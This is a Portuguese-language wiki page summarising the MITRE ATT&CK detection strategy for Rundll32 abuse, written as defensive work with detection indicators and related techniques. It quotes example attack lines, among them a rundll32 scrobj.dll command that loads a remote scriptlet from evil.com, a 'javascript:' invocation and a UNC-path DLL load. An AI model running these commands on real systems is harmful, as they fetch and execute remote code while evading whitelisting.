det0475-detection-strategy-for-t1218011-rundll32-abuse

# DET0475 — Detection Strategy for T1218.011 Rundll32 Abuse ## Descrição O `rundll32.exe` é um utilitário legítimo do Windows projetado para carregar e executar funções exportadas de DLLs. Adversários abusam do `rundll32.exe` para executar código malicioso — sejá em DLLs maliciosas, em arquivos COM scriptlet (`.sct`) via o pseudo-protocolo `scrobj.dll`, ou em código JavaScript/VBScript embutido — porque o `rundll32.exe` é assinado pela Microsoft e frequentemente permitido por políticas de Application Whitelisting. Técnicas incluem execução de DLLs maliciosas com argumento de ponto de entrada (`rundll32.exe malware.dll,EntryPoint`), uso de `rundll32.exe javascript:` para execução de código JavaScript diretamente, carregamento de COM scriptlets remotos via `rundll32.exe scrobj.dll,DllInstall /s /n /i:http://evil.com/payload.sct`, e uso de `rundll32.exe` para carregar DLLs de caminhos de rede (UNC paths). É uma das técnicas LOLBin mais utilizadas em ataques reais. A detecção requer análise rigorosa dos argumentos de linha de comando de `rundll32.exe`: identificar argumentos incomuns (JavaScript, URL remota, scrobj.dll), DLLs em locais não padrão, e ausência de referência a DLLs legítimas conhecidas do sistema. Correlação com processos filhos criados e conexões de rede subsequentes é essencial. ## Indicadores de Detecção - `rundll32.exe` com argumento contendo `javascript:`, `vbscript:` ou URL HTTP/HTTPS - `rundll32.exe scrobj.dll` seguido de argumento `/i:` com URL remota (squiblytwo attack) - `rundll32.exe` carregando DLL de caminho UNC (`\\server\share\evil.dll`) ou diretório temporário - Processo filho suspeito (cmd.exe, powershell.exe com download) criado por `rundll32.exe` - `rundll32.exe` sem argumento de função de exportação (invocação anômala para evasão de regex) - Conexão de rede iniciada por `rundll32.exe` para IP externo não associado a serviço Windows legítimo ## Técnicas Relacionadas - [[T1218011-rundll32|T1218.011 — Rundll32]] - [[T1218-signed-binary-proxy-execution|T1218 — Signed Binary Proxy Execution]] - [[T1059007-javascript|T1059.007 — JavaScript]] - [[t1105-ingress-tool-transfer|T1105 — Ingress Tool Transfer]] - [[t1027-obfuscated-files-or-information|T1027 — Obfuscated Files or Information]] - [[T1574001-dll-search-order-hijacking|T1574.001 — DLL Search Order Hijacking]] ## Analytics Relacionadas - [[an1308-analytic-1308|AN1308 — Analytic 1308]] --- *Fonte: [MITRE ATT&CK — DET0475](https://attack.mitre.org/detectionstrategies/DET0475)*